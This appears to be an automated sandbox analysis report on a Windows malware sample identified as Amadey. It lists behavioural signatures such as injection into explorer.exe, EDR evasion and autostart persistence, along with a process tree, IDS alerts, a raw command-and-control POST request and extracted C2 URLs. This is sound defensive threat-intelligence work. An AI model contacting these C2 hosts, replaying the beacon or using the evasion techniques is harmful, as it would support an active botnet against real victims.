Edit tour

Windows Analysis Report
BGUO31BLG4WQAOX9MA4VF71OJ1M.exe

Overview

General Information

Sample name:	BGUO31BLG4WQAOX9MA4VF71OJ1M.exe
Analysis ID:	1546122
MD5:	c52c721e095a91bb0d589dd0206d5f3d
SHA1:	2089df73d6ec0b8c193ddf39bda7e603a0a0bd0a
SHA256:	331f38a2128e273ac865be7c6722d4107ebf0cc77a5abd46965492dbad0fadf5
Tags:	exeuser-aachum
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

AI detected suspicious sample

Contains functionality to inject code into remote processes

Contains functionality to start a terminal service

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Writes to foreign memory regions

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries keyboard layouts

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

BGUO31BLG4WQAOX9MA4VF71OJ1M.exe (PID: 6072 cmdline: "C:\Users\user\Desktop\BGUO31BLG4WQAOX9MA4VF71OJ1M.exe" MD5: C52C721E095A91BB0D589DD0206D5F3D)

comp.exe (PID: 1356 cmdline: C:\Windows\SysWOW64\comp.exe MD5: 712EF348F7032AA1C80D24600BA5452D)

conhost.exe (PID: 1696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 316 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

QTAgent_40.exe (PID: 1820 cmdline: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe MD5: C52C721E095A91BB0D589DD0206D5F3D)

comp.exe (PID: 1280 cmdline: C:\Windows\SysWOW64\comp.exe MD5: 712EF348F7032AA1C80D24600BA5452D)

conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 4108 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

QTAgent_40.exe (PID: 3632 cmdline: C:\Users\user\AppData\Roaming\TlsServer\QTAgent_40.exe MD5: C52C721E095A91BB0D589DD0206D5F3D)

comp.exe (PID: 2220 cmdline: C:\Windows\SysWOW64\comp.exe MD5: 712EF348F7032AA1C80D24600BA5452D)

conhost.exe (PID: 3420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 2012 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
BGUO31BLG4WQAOX9MA4VF71OJ1M.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.1348154278.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000000.00000002.1376105942.000000000568C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.BGUO31BLG4WQAOX9MA4VF71OJ1M.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T14:25:18.189895+0100	2022930	1	A Network Trojan was detected	20.12.23.50	443	192.168.2.9	49805	TCP
2024-10-31T14:25:55.832788+0100	2022930	1	A Network Trojan was detected	20.12.23.50	443	192.168.2.9	49990	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T14:25:40.089539+0100	2856147	1	A Network Trojan was detected	192.168.2.9	49930	172.67.213.173	80	TCP

ETPRO MALWARE Amadey CnC Activity M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T14:25:37.559393+0100	2856148	1	A Network Trojan was detected	192.168.2.9	49916	172.67.213.173	80	TCP
2024-10-31T14:25:42.511087+0100	2856148	1	A Network Trojan was detected	192.168.2.9	49946	172.67.213.173	80	TCP
2024-10-31T14:25:47.403495+0100	2856148	1	A Network Trojan was detected	192.168.2.9	49975	172.67.213.173	80	TCP
2024-10-31T14:25:52.486086+0100	2856148	1	A Network Trojan was detected	192.168.2.9	49988	172.67.213.173	80	TCP
2024-10-31T14:25:57.394572+0100	2856148	1	A Network Trojan was detected	192.168.2.9	49991	172.67.213.173	80	TCP
2024-10-31T14:26:02.314368+0100	2856148	1	A Network Trojan was detected	192.168.2.9	49993	172.67.213.173	80	TCP
2024-10-31T14:26:07.225159+0100	2856148	1	A Network Trojan was detected	192.168.2.9	49995	172.67.213.173	80	TCP
2024-10-31T14:26:12.105745+0100	2856148	1	A Network Trojan was detected	192.168.2.9	49997	172.67.213.173	80	TCP
2024-10-31T14:26:17.158031+0100	2856148	1	A Network Trojan was detected	192.168.2.9	49999	172.67.213.173	80	TCP
2024-10-31T14:26:22.152809+0100	2856148	1	A Network Trojan was detected	192.168.2.9	50001	172.67.213.173	80	TCP
2024-10-31T14:26:27.099760+0100	2856148	1	A Network Trojan was detected	192.168.2.9	50003	172.67.213.173	80	TCP
2024-10-31T14:26:32.108410+0100	2856148	1	A Network Trojan was detected	192.168.2.9	50005	172.67.213.173	80	TCP
2024-10-31T14:26:37.057362+0100	2856148	1	A Network Trojan was detected	192.168.2.9	50007	172.67.213.173	80	TCP
2024-10-31T14:26:42.002816+0100	2856148	1	A Network Trojan was detected	192.168.2.9	50009	172.67.213.173	80	TCP
2024-10-31T14:26:46.990327+0100	2856148	1	A Network Trojan was detected	192.168.2.9	50011	172.67.213.173	80	TCP
2024-10-31T14:26:51.935172+0100	2856148	1	A Network Trojan was detected	192.168.2.9	50013	172.67.213.173	80	TCP
2024-10-31T14:26:56.940098+0100	2856148	1	A Network Trojan was detected	192.168.2.9	50015	172.67.213.173	80	TCP
2024-10-31T14:27:01.600269+0100	2856148	1	A Network Trojan was detected	192.168.2.9	50017	172.67.213.173	80	TCP
2024-10-31T14:27:06.558317+0100	2856148	1	A Network Trojan was detected	192.168.2.9	50019	172.67.213.173	80	TCP

ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T14:25:35.128154+0100	2856097	1	A Network Trojan was detected	192.168.2.9	49903	172.67.213.173	80	TCP
2024-10-31T14:25:40.089539+0100	2856097	1	A Network Trojan was detected	192.168.2.9	49930	172.67.213.173	80	TCP
2024-10-31T14:25:45.009461+0100	2856097	1	A Network Trojan was detected	192.168.2.9	49962	172.67.213.173	80	TCP
2024-10-31T14:25:49.964778+0100	2856097	1	A Network Trojan was detected	192.168.2.9	49987	172.67.213.173	80	TCP
2024-10-31T14:25:55.004933+0100	2856097	1	A Network Trojan was detected	192.168.2.9	49989	172.67.213.173	80	TCP
2024-10-31T14:25:59.923064+0100	2856097	1	A Network Trojan was detected	192.168.2.9	49992	172.67.213.173	80	TCP
2024-10-31T14:26:04.816947+0100	2856097	1	A Network Trojan was detected	192.168.2.9	49994	172.67.213.173	80	TCP
2024-10-31T14:26:09.717993+0100	2856097	1	A Network Trojan was detected	192.168.2.9	49996	172.67.213.173	80	TCP
2024-10-31T14:26:14.590623+0100	2856097	1	A Network Trojan was detected	192.168.2.9	49998	172.67.213.173	80	TCP
2024-10-31T14:26:19.728567+0100	2856097	1	A Network Trojan was detected	192.168.2.9	50000	172.67.213.173	80	TCP
2024-10-31T14:26:24.678101+0100	2856097	1	A Network Trojan was detected	192.168.2.9	50002	172.67.213.173	80	TCP
2024-10-31T14:26:29.635646+0100	2856097	1	A Network Trojan was detected	192.168.2.9	50004	172.67.213.173	80	TCP
2024-10-31T14:26:34.627410+0100	2856097	1	A Network Trojan was detected	192.168.2.9	50006	172.67.213.173	80	TCP
2024-10-31T14:26:39.610237+0100	2856097	1	A Network Trojan was detected	192.168.2.9	50008	172.67.213.173	80	TCP
2024-10-31T14:26:44.584818+0100	2856097	1	A Network Trojan was detected	192.168.2.9	50010	172.67.213.173	80	TCP
2024-10-31T14:26:49.516602+0100	2856097	1	A Network Trojan was detected	192.168.2.9	50012	172.67.213.173	80	TCP
2024-10-31T14:26:54.439609+0100	2856097	1	A Network Trojan was detected	192.168.2.9	50014	172.67.213.173	80	TCP
2024-10-31T14:26:59.340883+0100	2856097	1	A Network Trojan was detected	192.168.2.9	50016	172.67.213.173	80	TCP
2024-10-31T14:27:04.183234+0100	2856097	1	A Network Trojan was detected	192.168.2.9	50018	172.67.213.173	80	TCP

HTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: moviecentral-petparade.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: BGUO31BLG4WQAOX9MA4VF71OJ1M.exe, 00000000.00000002.1385998879.0000000006B2B000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 00000002.00000002.1649743130.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 00000008.00000002.1719433998.0000000004E38000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000A.00000002.1787037841.0000000004472000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2602250692.0000000004F4D000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.1720081684.0000000004D4E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.1788401445.0000000005310000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.php
Source: explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.php$
Source: explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.php&E
Source: explorer.exe, 0000000C.00000003.2251682160.00000000030DE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.00000000030CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.php2
Source: explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.php6D
Source: explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.php8E
Source: explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.php9D
Source: explorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.php?
Source: explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.phpDE
Source: explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.phpED
Source: explorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.phpO
Source: explorer.exe, 0000000C.00000003.2251682160.00000000030DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.phpR
Source: explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.phpTD
Source: explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.phpWE
Source: explorer.exe, 0000000C.00000003.2173467898.00000000030DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.phpb
Source: explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.phpcD
Source: explorer.exe, 0000000C.00000003.2347246744.000000000303F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.phpi
Source: explorer.exe, 0000000C.00000003.2347011547.00000000030BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.phppjy
Source: explorer.exe, 0000000C.00000003.2156799640.0000000003073000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.phpshqos.dll.muic
Source: explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.phpswsock.dll.mui
Source: explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.phpuE
Source: explorer.exe, 0000000C.00000002.2601540859.000000000307A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade.com/g9jvjfd73/index.phpwshqos.dll.mui
Source: explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade2.com/g9jvjfd74/index.php
Source: explorer.exe, 0000000C.00000003.2346778928.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade2.com/g9jvjfd74/index.php#K
Source: explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade2.com/g9jvjfd74/index.php&E
Source: explorer.exe, 0000000C.00000002.2601540859.000000000309C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2156799640.000000000309C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade2.com/g9jvjfd74/index.php)E
Source: explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade2.com/g9jvjfd74/index.php.php
Source: explorer.exe, 0000000C.00000003.2346778928.000000000307A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade2.com/g9jvjfd74/index.php/index.php
Source: explorer.exe, 0000000C.00000003.2347246744.000000000303F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2601540859.0000000003027000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://moviecentral-petparade2.com/g9jvjfd74/index.php1
